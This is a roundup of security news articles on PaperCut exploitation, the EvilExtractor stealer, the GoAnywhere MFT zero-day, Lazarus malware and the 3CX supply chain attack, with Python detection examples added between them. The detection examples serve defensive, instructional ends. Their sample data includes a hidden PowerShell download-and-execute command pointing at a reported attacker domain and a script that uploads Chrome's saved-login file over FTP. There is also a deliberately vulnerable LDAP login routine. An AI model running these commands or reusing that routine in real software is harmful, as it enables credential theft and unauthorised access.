Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers

Print management software provider PaperCut said that it has “evidence to suggest that unpatched servers are being exploited in the wild,” citing two vulnerability reports from cybersecurity company Trend Micro.

“PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC,” it further added.

The update comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw (CVE-2023-27350, CVSS score: 9.8) in PaperCut MF and NG to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from the PaperCut software to install remote monitoring and management (RMM) tools such as Atera and Syncro, giving the attackers persistent access and code execution on the compromised hosts.

Further infrastructure analysis revealed that the domain hosting the tools, windowservicecemter[.]com, was registered on April 12, 2023, and was also hosting the TrueBot downloader, although Huntress said it did not directly observe TrueBot being deployed.
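The parent-child relationship Huntress describes, the PaperCut application server spawning PowerShell, is the kind of process lineage a detection engineer can hunt for in endpoint telemetry. The following Python is an added example written for this page, not Huntress or PaperCut tooling: it scores process-creation events for a PaperCut parent launching a shell, for command lines that reference the RMM agents named above, and for the reported domain. The PaperCut process name (pc-app.exe), the record field names and the sample events are assumptions constructed for the example.

```python
"""Added example: score endpoint process-creation events for the PaperCut
exploitation pattern Huntress reported (application server spawning a shell,
RMM agent installation, contact with the reported domain).

Not Huntress or PaperCut code. The parent process name pc-app.exe, the
record field names and the sample events are assumptions for this example.
"""
from typing import Dict, Iterable, List, Tuple

# Assumption: the PaperCut MF/NG application server runs as pc-app.exe.
PAPERCUT_PARENTS = {"pc-app.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# RMM agents Huntress observed being installed after exploitation.
RMM_MARKERS = ("atera", "syncro")
# Infrastructure from the report, kept defanged in the rule set.
IOC_DOMAINS_DEFANGED = ("windowservicecemter[.]com",)


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as evil[.]example into evil.example."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(evt: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons: List[str] = []
    parent = _basename(evt.get("parent_image", ""))
    image = _basename(evt.get("image", ""))
    cmdline = evt.get("command_line", "").lower()

    if parent in PAPERCUT_PARENTS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    if any(marker in cmdline for marker in RMM_MARKERS):
        reasons.append("command line references an RMM agent installer")
    if any(refang(d) in cmdline for d in IOC_DOMAINS_DEFANGED):
        reasons.append("command line contains a reported IoC domain")
    return reasons


def scan(events: Iterable[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (event id, reasons) for every event that scored at least one reason."""
    return [(e["id"], r) for e in events if (r := score_event(e))]


# Constructed sample events in a simplified Sysmon Event ID 1 layout; not real logs.
SAMPLE_EVENTS = [
    {"id": "e1", "parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"iwr http://windowservicecemter.com/a.ps1 | iex\""},
    {"id": "e2", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "command_line": "pc-app.exe -service"},
    {"id": "e3", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Process"},
    {"id": "e4", "parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c msiexec /i C:\\Windows\\Temp\\AteraAgent.msi /qn"},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

The lineage rule on its own is the high-signal one: a print server's application process has no legitimate reason to start a shell, so it should fire even when the command line is empty or obfuscated; the RMM and domain checks add context for triage rather than acting as the primary trigger.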

TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical links with Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.

“While the ultimate goal of the current activity leveraging PaperCut’s software is unknown, these links (albeit somewhat circumstantial) to a known ransomware entity are concerning,” Huntress researchers said.

“Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment.”

Users are recommended to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11, and 22.0.9) as soon as possible, regardless of whether the server is “available to external or internal connections,” to mitigate potential risks.

Customers who are unable to apply the security update are advised to lock down network access to the servers by blocking all inbound traffic from external IP addresses and restricting inbound access to the IP addresses of verified site servers.

 

(c) Ravie Lakshmanan

New All-in-One “EvilExtractor” Stealer for Windows Systems Surfaces on the Dark Web

A new “all-in-one” stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems.

“It includes several modules that all work via an FTP service,” Fortinet FortiGuard Labs researcher Cara Lin said. “It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker’s FTP server.”

The network security company said it observed a surge in attacks spreading the malware in the wild in March 2023, with a majority of the victims located in Europe and the U.S. While marketed as an educational tool, EvilExtractor has been adopted by threat actors for use as an information stealer.

The attack tool is being sold by an actor named Kodex on cybercrime forums like Cracked dating back to October 22, 2022. It’s continually updated and packs in various modules to siphon system metadata, passwords and cookies from various web browsers as well as record keystrokes and even act as a ransomware by encrypting files on the target system.

The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their “account details.”

The “Account_Info.exe” binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, besides gathering files, can also activate the webcam and capture screenshots.
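Because the final stage is launched from a Base64-encoded PowerShell script, process command-line telemetry will show an -EncodedCommand blob rather than readable code. The following Python is an added example written for this page, not Fortinet's analysis tooling: it decodes such a blob (PowerShell expects UTF-16LE) and checks the plaintext for the behaviours the write-up attributes to EvilExtractor, namely FTP upload, browser credential store access, screen or webcam capture, and download cradles. The indicator patterns and the sample command line are constructed for the example.

```python
"""Added example: decode PowerShell -EncodedCommand blobs found in process
command lines and look for the behaviours Fortinet attributes to EvilExtractor.

Written for this page, not Fortinet tooling. The indicator regexes and the
sample command line below are constructed for the example.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts -e, -ec, -en, -enc, ... as abbreviations of -EncodedCommand.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours described in the write-up: FTP exfiltration, browser credential
# store access, screen/webcam capture, download-and-execute cradles.
INDICATORS: Dict[str, re.Pattern] = {
    "ftp_exfil": re.compile(r"ftp://|FtpWebRequest|\.UploadFile\(", re.IGNORECASE),
    "browser_data": re.compile(r"Login Data|\\Cookies|Local State", re.IGNORECASE),
    "capture": re.compile(r"CopyFromScreen|webcam", re.IGNORECASE),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression", re.IGNORECASE),
}


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None."""
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    raw = base64.b64decode(match.group(1), validate=True)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Some loaders Base64-encode plain UTF-8 instead; fall back rather than drop the event.
        return raw.decode("utf-8", errors="replace")


def analyse(cmdline: str) -> Dict[str, object]:
    """Decode (if needed) and report which indicator families match."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Two independent behaviour families is the threshold used here; tune it for your telemetry.
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


# Constructed sample: a script that uploads a Chromium credential store over FTP.
SAMPLE_SCRIPT = (
    "$p = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\"; "
    "$c = New-Object System.Net.WebClient; "
    "$c.UploadFile('ftp://198.51.100.7/up/' + $env:COMPUTERNAME, $p)"
)
SAMPLE_CMDLINE = "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(analyse(SAMPLE_CMDLINE))
```

Decoding before matching is the point: a rule that only inspects the raw command line sees nothing but a Base64 string, while the decoded script exposes the FTP destination and the credential database path that triage needs.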

“EvilExtractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware,” Lin said. “Its PowerShell script can elude detection in a .NET loader or PyArmor. Within a very short time, its developer has updated several functions and increased its stability.”

The findings come as Secureworks Counter Threat Unit (CTU) detailed a malvertising and SEO poisoning campaign used to deliver the Bumblebee malware loader via trojanized installers of legitimate software.


Bumblebee, first documented a year ago by Google's Threat Analysis Group and Proofpoint, is a modular loader that is primarily propagated through phishing. It is suspected to have been developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.

The use of SEO poisoning and malicious ads to redirect users searching for popular tools like ChatGPT, Cisco AnyConnect, Citrix Workspace, and Zoom to rogue websites hosting tainted installers has witnessed a spike in recent months after Microsoft began blocking macros by default from Office files downloaded from the internet.

In one incident described by the cybersecurity firm, the threat actor used the Bumblebee malware to obtain an entry point and move laterally after three hours to deploy Cobalt Strike and legitimate remote access software like AnyDesk and Dameware. The attack was ultimately disrupted before it proceeded to the final ransomware stage.

“To mitigate this and similar threats, organizations should ensure that software installers and updates are only downloaded from known and trusted websites,” Secureworks said. “Users should not have privileges to install software and run scripts on their computers.”

 

(c) Ravie Lakshmanan

Fortra Sheds Light on GoAnywhere MFT Zero-Day Exploit Used in Ransomware Attacks

Fortra, the company behind Cobalt Strike, shed light on a zero-day remote code execution (RCE) vulnerability in its GoAnywhere MFT tool that has come under active exploitation by ransomware actors to steal sensitive data.

The high-severity flaw, tracked as CVE-2023-0669 (CVSS score: 7.2), is a pre-authentication command injection that could be abused to achieve code execution. The issue was patched by the company in version 7.1.2 of the software in February 2023, but not before it had been weaponized as a zero-day from January 18 onward.

Fortra, which worked with Palo Alto Networks Unit 42, said it was made aware of suspicious activity associated with some of the file transfer instances on January 30, 2023.

“The unauthorized party used CVE-2023-0669 to create unauthorized user accounts in some MFTaaS customer environments,” the company said. “For a subset of these customers, the unauthorized party leveraged these user accounts to download files from their hosted MFTaaS environments.”

The threat actor further abused the flaw to deploy two additional tools, dubbed “Netcat” and “Errors.jsp,” between January 28, 2023 and January 31, 2023, although not every installation attempt is said to have been successful.

Fortra said it directly reached out to affected customers, and that it has found no sign of unauthorized access to customer systems that have been reprovisioned with a “clean and secure MFTaaS environment.”

While Netcat is a legitimate utility for reading from and writing to network connections, it is currently not known how the JSP file was used in the attacks.

The investigation also found that CVE-2023-0669 was exploited against a small number of on-premises installations running a specific configuration of the GoAnywhere MFT solution.

As mitigations, the company is recommending that users rotate the Master Encryption Key, reset all credentials, review audit logs, and delete any suspicious admin or user accounts.

The development comes as Malwarebytes and NCC Group reported a spike in ransomware attacks during the month of March, largely driven by active exploitation of the GoAnywhere MFT vulnerability.

A total of 459 attacks were recorded last month alone, a 91% increase from February 2023 and a 62% jump when compared to March 2022.

“The ransomware-as-a-service (RaaS) provider, Cl0p, successfully exploited the GoAnywhere vulnerability and was the most active threat actor observed, with 129 victims in total,” NCC Group said.

Cl0p’s exploitation spree marks the second time LockBit has been knocked off the top spot since September 2021. Other prevalent ransomware strains included Royal, BlackCat, Play, Black Basta, and BianLian.

It’s worth noting that the Cl0p actors previously exploited zero-day flaws in Accellion File Transfer Appliance (FTA) to breach several targets in 2021.

 

(c) Ravie Lakshmanan

Lazarus Group Adds Linux Malware to Arsenal in Operation Dream Job

The notorious North Korea-aligned state-sponsored actor known as the Lazarus Group has been attributed to a new campaign aimed at Linux users.

The attacks are part of a persistent and long-running activity tracked under the name Operation Dream Job, ESET said in a new report published today.

The findings are significant, not least because they mark the first publicly documented example of the adversary using Linux malware as part of this social engineering scheme.

Operation Dream Job, also known as DeathNote or NukeSped, refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. It also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star.

The attack chain discovered by ESET follows the same pattern: a fake HSBC job offer is delivered as a decoy inside a ZIP archive, which is then used to launch a Linux backdoor named SimplexTea, distributed via an OpenDrive cloud storage account.


While the exact method used to distribute the ZIP file is not known, it’s suspected to be either spear-phishing or direct messages on LinkedIn. The backdoor, written in C++, bears similarities to BADCALL, a Windows trojan previously attributed to the group.

Furthermore, ESET said it identified commonalities between artifacts used in the Dream Job campaign and those unearthed as part of the supply chain attack on VoIP software developer 3CX that came to light last month.

This also includes the command-and-control (C2) domain “journalide[.]org,” which was listed as one of the four C2 servers used by malware families detected within the 3CX environment.

Indications are that preparations for the supply chain attack had been underway since December 2022, when some of the components were committed to the GitHub code-hosting platform.

The findings not only strengthen the existing link between Lazarus Group and the 3CX compromise, but also demonstrate the threat actor's continued success with staging supply chain attacks since 2020.

 

(c) Ravie Lakshmanan

Beyond Traditional Security: NDR’s Pivotal Role in Safeguarding OT Networks

Why is Visibility into OT Environments Crucial?

The significance of Operational Technology (OT) for businesses is undeniable as the OT sector flourishes alongside the already thriving IT sector. OT includes industrial control systems, manufacturing equipment, and devices that oversee and manage industrial environments and critical infrastructures. In recent years, adversaries have recognized the lack of detection and protection in many industrial systems and are actively exploiting these vulnerabilities. In response, IT security leaders have become more aware of the need to protect their OT environments with security monitoring and response capabilities. This development was accelerated by severe past cyber incidents targeting critical OT environments and even causing physical damage to infrastructures. Given the pivotal role these systems play in business operations and modern society, ensuring their security is of utmost importance.

The underlying trend is clear: OT and IoT networks are progressively integrated with traditional IT networks for management and access purposes, leading to increased communication between these devices both internally and externally. This not only affects the networks themselves but also carries significant ramifications for the security teams responsible for safeguarding the environment. Although this convergence of OT and IT offers numerous benefits, such as enhanced efficiency and reduced operational costs, it also gives rise to new security risks and challenges, rendering OT environments more vulnerable to cyber threats. As evidenced by past attacks, these threats often go undetected due to insufficient security monitoring, allowing threat actors to remain in the environment for extended durations. As a result, achieving holistic visibility and effective anomaly detection in OT environments is pivotal for maintaining steadfast security and control.

What Challenges Arise in Monitoring OT Environments?

First and foremost, understanding the unique threat landscape of OT environments is crucial. Traditional IT security detection methods fall short in this context: OT networks require different sensitivity thresholds, more refined monitoring per network segment or device group, and OT-specific detection mechanisms. Unlike IT attacks, which typically focus on data theft, OT attacks usually aim for physical impact. Moreover, as recent examples demonstrate, ransomware targeting OT is on the rise and directly affects the availability of control systems and safety.

Second, monitoring OT environments requires the consideration of various aspects, such as supplier access management, device management, and network communications. Controlling and overseeing supplier access to OT and IoT networks is challenging, as connections between external and internal networks can occur through various means like VPNs, direct mobile connections, and jump hosts. Another hurdle is device management, which encompasses update mechanisms and protection against unauthorized access or manipulation. Implementing regular updating routines and deploying Endpoint Detection & Response (EDR) on OT and IoT devices is often limited or infeasible. The variety of devices, their life spans, and device-specific operating systems make deploying security software to monitor OT devices difficult and cumbersome.

Third, traditional IT network detection methods require in-depth protocol knowledge, which, in the OT context, includes a wide range of different protocols and attack scenarios absent in traditional rule sets. OT network devices connect IoT sensors and machines using communication protocols uncommon in traditional IT networks. In terms of more intrusive security solutions, active vulnerability scanning methods can also be problematic in OT environments, as they may cause disruptions or even outages. The same applies to Intrusion Prevention Systems (IPS) because they could block network packets, impacting stability and business continuity in OT environments. As a result, passive network detection systems like Network Detection & Response (NDR) solutions are better suited for this purpose.

How Can I Effectively Monitor and Secure My OT Environment?

While secure access management and device lifecycle management are essential, their seamless implementation can be incredibly challenging. In this context, Network Detection and Response (NDR) solutions offer a non-intrusive and effective approach to monitoring OT environments. By focusing on communication patterns for OT devices, the intersection between IT and OT, and third-party access to OT networks, NDR systems provide comprehensive visibility and detection capabilities without disrupting industrial operations and business processes.

In particular, NDR solutions with advanced baselining capabilities excel at identifying new and unusual communication patterns that could indicate malicious activities within OT networks. Utilizing flow information for baselining, these NDR systems provide protocol and device-independent anomaly detection by learning who communicates with whom and at what frequency. Instead of manually configuring these parameters, the NDR learns the baseline and alerts the security teams on unusual requests or changes in the frequency. In addition, a flexible use case framework allows setting fine-tuned thresholds for OT-specific monitoring, including the ability to set load monitoring with network zone-specific granularity. Moreover, the use of Machine Learning algorithms allows for more accurate detection of anomalies and potential threats compared to traditional rule-based systems.
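The baselining described above, learning who talks to whom and how often and alerting on departures from that baseline, can be shown in a few dozen lines of code. The following Python is an added example written for this page, not ExeonTrace or any other vendor's code: it builds a per-(source, destination, port) hourly baseline from flow records, then flags pairs never seen during training and pairs whose hourly rate jumps well above baseline. The flow records, addresses and ports (a Modbus/TCP HMI-to-PLC conversation on port 502 and an EtherNet/IP engineering-workstation link on port 44818) are constructed for the example.

```python
"""Added example: flow-based baselining for an OT segment. Written for this
page; not ExeonTrace or any vendor's code. Flow records, addresses and
ports are constructed for the example.
"""
from collections import Counter, defaultdict
from statistics import mean, pstdev
from typing import Dict, Iterable, List, Tuple

Pair = Tuple[str, str, int]          # (src_ip, dst_ip, dst_port)
Flow = Tuple[int, str, str, int]     # (hour_bucket, src_ip, dst_ip, dst_port)


def build_baseline(flows: Iterable[Flow]) -> Dict[Pair, Tuple[float, float]]:
    """Learn, for each (src, dst, port) pair, the mean and population std-dev of
    flows per hour over the training window. Hours with no flows count as zero,
    so a pair that is quiet most of the day gets a low mean, not a missing one."""
    per_pair: Dict[Pair, Counter] = defaultdict(Counter)
    hours = set()
    for hour, src, dst, port in flows:
        per_pair[(src, dst, port)][hour] += 1
        hours.add(hour)
    ordered_hours = sorted(hours)
    return {pair: (mean([c.get(h, 0) for h in ordered_hours]),
                   pstdev([c.get(h, 0) for h in ordered_hours]))
            for pair, c in per_pair.items()}


def detect(baseline: Dict[Pair, Tuple[float, float]], flows: Iterable[Flow],
           z_threshold: float = 3.0, min_delta: int = 5) -> List[str]:
    """Alert on pairs absent from the baseline and on hourly counts that exceed
    the learned mean by more than z_threshold standard deviations."""
    observed: Dict[Pair, Counter] = defaultdict(Counter)
    for hour, src, dst, port in flows:
        observed[(src, dst, port)][hour] += 1
    alerts: List[str] = []
    for (src, dst, port), counts in observed.items():
        if (src, dst, port) not in baseline:
            alerts.append(f"NEW_PAIR {src}->{dst}:{port}")
            continue
        mu, sigma = baseline[(src, dst, port)]
        for hour, n in sorted(counts.items()):
            # Floor sigma at 1: a perfectly regular OT baseline has sigma 0 and would
            # otherwise make every one-flow deviation an infinite z-score.
            z = (n - mu) / max(sigma, 1.0)
            if z > z_threshold and n - mu >= min_delta:
                alerts.append(f"RATE_SPIKE {src}->{dst}:{port} hour={hour} n={n} baseline={mu:.1f}")
    return alerts


def _constructed_flows(hours: Iterable[int], src: str, dst: str, port: int, per_hour: int) -> List[Flow]:
    """Synthetic flow records: per_hour flows for each hour bucket (constructed data)."""
    return [(h, src, dst, port) for h in hours for _ in range(per_hour)]


# Training window: 24 steady hours of HMI->PLC Modbus polling and light workstation traffic.
TRAINING = (_constructed_flows(range(24), "10.0.1.5", "10.0.2.10", 502, 6)
            + _constructed_flows(range(24), "10.0.1.20", "10.0.2.10", 44818, 2))
# Detection window: HMI unchanged, workstation rate explodes, and an unknown host talks Modbus.
TEST_WINDOW = (_constructed_flows([24], "10.0.1.5", "10.0.2.10", 502, 6)
               + _constructed_flows([24], "10.0.1.20", "10.0.2.10", 44818, 40)
               + _constructed_flows([24], "10.0.1.99", "10.0.2.10", 502, 1))


def run_example() -> List[str]:
    return detect(build_baseline(TRAINING), TEST_WINDOW)


if __name__ == "__main__":
    for alert in run_example():
        print(alert)
```

Two details matter in practice: the baseline must be learned over a window long enough to contain the plant's normal cycles (shift changes, nightly backups), and a "new pair" alert should be suppressed for pairs an operator has explicitly approved, otherwise every scheduled vendor session becomes an incident.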

As a result, the passive monitoring capabilities of NDR solutions are vital for OT and IoT environments, where alternative monitoring methods may be difficult to implement or cause disruptions. ExeonTrace, a particularly robust and easy-to-implement ML-driven NDR system for OT environments, analyzes log data from traditional IT environments, OT networks, and jump host gateways, to provide a comprehensive and holistic view of network activity. Therein, the flexibility of integrating various third-party log sources, such as OT-specific logs, is crucial. Moreover, ExeonTrace’s ability to integrate with other OT-specific detection platforms enhances its capabilities and ensures extensive security coverage.


In summary, NDR solutions like ExeonTrace effectively address the distinct challenges of OT monitoring, establishing the Swiss NDR system as the favored detection approach for safeguarding OT environments. By implementing ML-driven NDR systems like ExeonTrace, organizations can reliably monitor and secure their industrial operations, ensuring business continuity through an automated, efficient, and hardware-free approach. Find out if ExeonTrace is the ideal solution for your business and request a demo today.

 

(c) Ravie Lakshmanan

Two Critical Flaws Found in Alibaba Cloud’s PostgreSQL Databases

A chain of two critical flaws has been disclosed in Alibaba Cloud’s ApsaraDB RDS for PostgreSQL and AnalyticDB for PostgreSQL that could be exploited to breach tenant isolation protections and access sensitive data belonging to other customers.

“The vulnerabilities potentially allowed unauthorized access to Alibaba Cloud customers’ PostgreSQL databases and the ability to perform a supply chain attack on both Alibaba database services, leading to an RCE on Alibaba database services,” cloud security firm Wiz said in a new report shared with The Hacker News.

The issues, dubbed BrokenSesame, were reported to Alibaba Cloud in December 2022, and mitigations were deployed by the company on April 12, 2023. There is no evidence to suggest that the weaknesses were exploited in the wild.

In a nutshell, the vulnerabilities – a privilege escalation flaw in AnalyticDB and a remote code execution bug in ApsaraDB RDS – made it possible to elevate privileges to root within the container, escape to the underlying Kubernetes node, and ultimately obtain unauthorized access to the API server.

Armed with this capability, an attacker could retrieve credentials associated with the container registry from the API server and push a malicious image to gain control of customer databases belonging to other tenants on the shared node.


“The credentials used to pull images were not scoped correctly and allowed push permissions, laying the foundation for a supply-chain attack,” Wiz researchers Ronen Shustin and Shir Tamari said.

This is not the first time PostgreSQL vulnerabilities have been identified in cloud services. Last year, Wiz uncovered similar issues in Azure Database for PostgreSQL Flexible Server (ExtraReplica) and IBM Cloud Databases for PostgreSQL (Hell’s Keychain).

The findings come as Palo Alto Networks Unit 42, in its Cloud Threat Report, revealed that “threat actors have become adept at exploiting common, everyday issues in the cloud,” including misconfigurations, weak credentials, lack of authentication, unpatched vulnerabilities and malicious open source software (OSS) packages.

“76% of organizations don’t enforce MFA [multi-factor authentication] for console users, while 58% of organizations don’t enforce MFA for root/admin users,” the cybersecurity firm said.

 

(c) Ravie Lakshmanan

Cisco and VMware Release Security Updates to Patch Critical Flaws in their Products

Cisco and VMware have released security updates to address critical security flaws in their products that could be exploited by malicious actors to execute arbitrary code on affected systems.

The most severe of the vulnerabilities is a command injection flaw in Cisco Industrial Network Director (CVE-2023-20036, CVSS score: 9.9), which resides in the web UI component and arises as a result of improper input validation when uploading a Device Pack.

“A successful exploit could allow the attacker to execute arbitrary commands as NT AUTHORITY\SYSTEM on the underlying operating system of an affected device,” Cisco said in an advisory released on April 19, 2023.

The networking equipment major also resolved a medium-severity file permissions vulnerability in the same product (CVE-2023-20039, CVSS score: 5.5) that an authenticated, local attacker could abuse to view sensitive information.

Patches have been made available in version 1.11.3, with Cisco crediting an unnamed “external” researcher for reporting the two issues.

Also fixed by Cisco is another critical flaw in the external authentication mechanism of the Modeling Labs network simulation platform. Tracked as CVE-2023-20154 (CVSS score: 9.1), the vulnerability could permit an unauthenticated, remote attacker to access the web interface with administrative privileges.

“To exploit this vulnerability, the attacker would need valid user credentials that are stored on the associated external authentication server,” the company noted.

“If the LDAP server is configured in such a way that it will reply to search queries with a non-empty array of matching entries (replies that contain search result reference entries), this authentication bypass vulnerability can be exploited.”

While there are workarounds that plug the security hole, Cisco cautions customers to test the effectiveness of such remediations in their own environments before administering them. The shortcoming has been patched with the release of version 2.5.1.
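The advisory's description, an authentication bypass that depends on the LDAP server answering a search with matching entries, matches a common integration mistake: treating a successful search for the username as proof that the user authenticated, instead of binding to the directory with the user's password. The Python below is an added example written for this page and is not Cisco's code; it uses an in-memory stand-in for an LDAP server (constructed so the example runs offline) to show the search-only check beside the corrected search-then-bind check, including the empty-password case that real servers treat as an unauthenticated bind.

```python
"""Added example: the search-only LDAP "authentication" mistake beside the
corrected search-then-bind flow. Written for this page; not Cisco's code.
FakeDirectory is an in-memory stand-in for an LDAP server, constructed so
the example runs offline.
"""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class FakeDirectory:
    """Maps DN -> attributes and answers search() and bind() like a directory would."""
    entries: Dict[str, Dict[str, str]] = field(default_factory=dict)

    def search(self, uid: str) -> List[str]:
        """Return the DNs whose uid attribute equals the supplied username."""
        return [dn for dn, attrs in self.entries.items() if attrs.get("uid") == uid]

    def bind(self, dn: str, password: str) -> bool:
        """Simple bind. RFC 4513 section 5.1.2: a bind with an empty password is an
        *unauthenticated* bind that many servers accept, so it must never count as success."""
        if not password:
            return False
        entry = self.entries.get(dn)
        return entry is not None and entry.get("userPassword") == password


def vulnerable_login(directory: FakeDirectory, username: str, password: str) -> bool:
    """Treats a non-empty search result as proof of identity. The password is
    never checked, so any username that exists in the directory logs in."""
    return len(directory.search(username)) > 0


def fixed_login(directory: FakeDirectory, username: str, password: str) -> bool:
    """Resolve the DN, require exactly one match, then bind as that DN with the
    user's password; the bind outcome is the only thing that grants access."""
    if not password:
        return False
    matches = directory.search(username)
    if len(matches) != 1:
        return False
    return directory.bind(matches[0], password)


# Constructed directory contents for the example.
DIRECTORY = FakeDirectory({
    "uid=alice,ou=people,dc=example,dc=com": {"uid": "alice", "userPassword": "correct-horse"},
    "uid=bob,ou=people,dc=example,dc=com": {"uid": "bob", "userPassword": "battery-staple"},
})

if __name__ == "__main__":
    for fn in (vulnerable_login, fixed_login):
        print(fn.__name__, "alice/wrong ->", fn(DIRECTORY, "alice", "wrong"))
```

When auditing a product's external-authentication integration, the question to ask is the same one this example isolates: is there a bind (or an equivalent credential verification) in the success path, or does the code only confirm that a record for the username exists?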

VMware ships updates for Aria Operations for Logs

VMware, in an advisory released on April 20, 2023, warned of a critical deserialization flaw impacting multiple versions of Aria Operations for Logs (CVE-2023-20864, CVSS score: 9.8).

“An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root,” the virtualization services provider said.

VMware Aria Operations for Logs 8.12 fixes this vulnerability along with a high-severity command injection flaw (CVE-2023-20865, CVSS score: 7.2) that could allow an attacker with admin privileges to run arbitrary commands as root.

“CVE-2023-20864 is a critical issue and should be patched immediately,” the company said. “It needs to be highlighted that only version 8.10.2 is impacted by this vulnerability.”

The alert comes almost three months after VMware plugged two critical issues in the same product (CVE-2022-31704 and CVE-2022-31706, CVSS scores: 9.8) that could result in remote code execution.

With Cisco and VMware appliances turning out to be lucrative targets for threat actors, it’s recommended that users move quickly to apply the updates to mitigate potential threats.

 

(c) Ravie Lakshmanan

N.K. Hackers Employ Matryoshka Doll-Style Cascading Supply Chain Attack on 3CX

The supply chain attack targeting 3CX was the result of a prior supply chain compromise associated with a different company, demonstrating a new level of sophistication among North Korean threat actors.

Google-owned Mandiant, which is tracking the attack event under the moniker UNC4736, said the incident marks the first time it has seen a “software supply chain attack lead to another software supply chain attack.”

The Matryoshka doll-style cascading attack against 3CX first came to light on March 29, 2023, when it emerged that Windows and macOS versions of its communication software had been trojanized to deliver a C/C++-based information stealer named ICONIC Stealer by means of a downloader, SUDDENICON, that used icon files hosted on GitHub to extract the address of the server hosting the stealer.

“The malicious application next attempts to steal sensitive information from the victim user’s web browser,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an analysis of the malware. “Specifically it will target the Chrome, Edge, Brave, or Firefox browsers.”

Select attacks targeting cryptocurrency companies also entailed the deployment of a next-stage backdoor referred to as Gopuram that’s capable of running additional commands and interacting with the victim’s file system.

Mandiant's investigation into the sequence of events has now revealed patient zero to be a malicious version of a now-discontinued software package provided by a fintech company called Trading Technologies, which a 3CX employee downloaded to their personal computer.

It described the initial intrusion vector as “a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER.”

This rogue installer, in turn, contained a setup binary that dropped two trojanized DLLs and an innocuous executable, the latter of which is used to side-load one of the DLLs that’s camouflaged as a legitimate dependency.

The attack chain then made use of open source tools like SIGFLIP and DAVESHELL to ultimately extract and execute VEILEDSIGNAL, a multi-stage modular backdoor written in C that’s capable of sending data, executing shellcode, and terminating itself.

The initial compromise of the employee’s personal computer using VEILEDSIGNAL enabled the threat actor to obtain the individual’s corporate credentials, two days after which the first unauthorized access of 3CX’s network took place via a VPN by taking advantage of the stolen credentials.


Besides identifying tactical similarities between the compromised X_TRADER and 3CXDesktopApp apps, Mandiant found that the threat actor subsequently laterally moved within the 3CX environment and breached the Windows and macOS build environments.

“On the Windows build environment, the attacker deployed a TAXHAUL launcher and COLDCAT downloader that persisted by performing DLL side-loading through the IKEEXT service and ran with LocalSystem privileges,” Mandiant said. “The macOS build server was compromised with POOLRAT backdoor using Launch Daemons as a persistence mechanism.”

POOLRAT, previously classified by the threat intelligence firm as SIMPLESEA, is a C/C++ macOS implant capable of collecting basic system information and executing arbitrary commands, including carrying out file operations.

